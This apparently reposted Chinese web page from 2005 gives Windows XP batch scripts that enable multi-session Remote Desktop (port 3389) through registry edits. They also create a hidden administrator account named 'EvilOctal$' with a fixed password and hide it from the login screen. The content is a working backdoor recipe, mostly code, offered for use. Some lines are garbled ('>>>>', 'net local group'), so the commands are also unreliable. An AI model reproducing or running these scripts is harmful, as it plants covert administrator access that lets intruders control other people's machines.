?? xp終端服務遠程登錄批處理.txt
字號:
XP終端服務遠程登錄批處理 ★★★ 【字體:小 大】
XP終端服務遠程登錄批處理
作者:未知 文章來源:網絡 點擊數:1285 更新時間:2005-1-10
@echo REGEDIT4>C:\est.reg
@echo. >>C:\est.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core]>>C:\est.reg
@echo "EnableConcurrenSessions"=dword:00000000>>C:\est.reg
@echo "Tsenabled"=dword:00000001>>>>C:\est.reg
@regedit /s C:\est.reg
@del /y C:\est.reg
@net start termservice
@shutdown -l
這樣就開啟了XP中3389的多用戶模式...
下面我們加入一個用戶并且同步解決在使用友好登錄的時候面版上的用戶名:)
這個batch這樣寫
@net user EvilOctal$ security /add
@net local group administrators EvilOctal$ /add
@echo REGEDIT4>C:\EvilOctal.reg
@echo. >>C:\EvilOctal.reg
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\winlogon\specialaccounts\userlist]>>C:\EvilOctal.reg
@echo "EvilOctal$"=dword:00000000>>C:\EvilOctal.reg
@regedit /s C:\EvilOctal.reg
@del /y C:\EvilOctal.reg
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -